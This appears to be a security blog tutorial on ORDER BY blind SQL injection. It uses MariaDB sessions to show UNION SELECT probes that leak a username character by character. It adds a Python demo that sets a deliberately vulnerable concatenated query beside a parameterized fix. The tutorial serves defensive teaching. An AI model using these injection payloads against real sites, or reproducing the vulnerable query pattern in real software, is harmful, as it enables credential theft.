ORDER BY blind injection
A normal query (the database is just one I had lying around):
MariaDB [test]> select * from test1 where username='vampire';
+---------------------------+-------------+
| username                  | password    |
+---------------------------+-------------+
| vampire                   | mypassword  |
| vampire                   | random_pass |
+---------------------------+-------------+
2 rows in set (0.001 sec)
ORDER BY injection
MariaDB [test]> select * from test1 where username='vampire' union select 1,2 order by 1;
+---------------------------+-------------+
| username                  | password    |
+---------------------------+-------------+
| 1                         | 2           |
| vampire                   | random_pass |
| vampire                   | mypassword  |
+---------------------------+-------------+
3 rows in set (0.001 sec)
order by 1 means the result set is sorted by the first column, so the position of the injected row relative to the real rows tells you whether the injected string sorts before or after the real value. Use a script to iterate over candidate values for the first column; when the iteration reaches the character w, the query result looks like this:
MariaDB [test]> select * from test1 where username='vampire' union select 'w',2 order by 1;
+---------------------------+-------------+
| username                  | password    |
+---------------------------+-------------+
| vampire                   | random_pass |
| vampire                   | mypassword  |
| w                         | 2           |
+---------------------------+-------------+
3 rows in set (0.001 sec)
Notice that the order of the result set has changed (the injected row now sorts after the real rows). Next, probe the second character:
MariaDB [test]> select * from test1 where username='vampire' union select 'va',2 order by 1;
+---------------------------+-------------+
| username                  | password    |
+---------------------------+-------------+
| va                        | 2           |
| vampire                   | random_pass |
| vampire                   | mypassword  |
+---------------------------+-------------+
3 rows in set (0.002 sec)

MariaDB [test]> select * from test1 where username='vampire' union select 'vb',2 order by 1;
+---------------------------+-------------+
| username                  | password    |
+---------------------------+-------------+
| vampire                   | random_pass |
| vampire                   | mypassword  |
| vb                        | 2           |
+---------------------------+-------------+
3 rows in set (0.002 sec)
Continuing in this way, character by character, and reading only which row the web page renders first, the correct username and password can be recovered even though the page never displays the injected data directly.
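The following added example (not part of the original post) shows why the technique above works and what stops it. It places a hypothetical vulnerable lookup that concatenates the input into the SQL text next to the hardened version that binds the value as a parameter, and runs both against a constructed copy of the page's test1 table. sqlite3 is used as an offline stand-in for MariaDB; the probes are the page's own UNION ... ORDER BY statements, with a trailing SQL comment so that the closing quote appended by the assumed template is ignored. Against the concatenated query the first row returned moves exactly as in the MariaDB sessions above; against the parameterized query the same input is just a username that matches nothing.

```python
import sqlite3

# Constructed sample data mirroring the page's test1 table. sqlite3 stands in
# for MariaDB so the example runs offline (assumption noted in the lead-in).
ROWS = [("vampire", "mypassword"), ("vampire", "random_pass")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE test1 (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO test1 VALUES (?, ?)", ROWS)
    return conn


def lookup_vulnerable(conn, username):
    """Hypothetical vulnerable lookup: the value is concatenated into the SQL
    text, so a UNION ... ORDER BY inside it is parsed as part of the query and
    decides which row comes first."""
    sql = "select * from test1 where username='" + username + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, username):
    """Hardened lookup: a bound parameter is compared as a plain string, so the
    same input simply matches no username."""
    sql = "select * from test1 where username=?"
    return conn.execute(sql, (username,)).fetchall()


def run_probe(value):
    """Return (first username the vulnerable query yields, row count from the
    safe query) for one input value."""
    conn = make_db()
    try:
        vuln = lookup_vulnerable(conn, value)
        safe = lookup_safe(conn, value)
    finally:
        conn.close()
    first = vuln[0][0] if vuln else None
    return first, len(safe)


if __name__ == "__main__":
    # The page's two probes. The trailing "-- " comments out the closing quote
    # that the vulnerable template appends (assumption about the template).
    for value in ("vampire",
                  "vampire' union select 'va',2 order by 1 -- ",
                  "vampire' union select 'vb',2 order by 1 -- "):
        print(repr(value), "->", run_probe(value))
```

With the concatenated query, 'va' sorts before 'vampire' and becomes the first row, while 'vb' sorts after it and 'vampire' stays first; that single bit of ordering is the whole side channel. The parameterized query returns zero rows for both probes, so there is no ordering to observe. Where an application must let users choose a sort column, the same rule applies: map the user's choice onto an allow-list of column names rather than placing the raw value into the ORDER BY clause.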
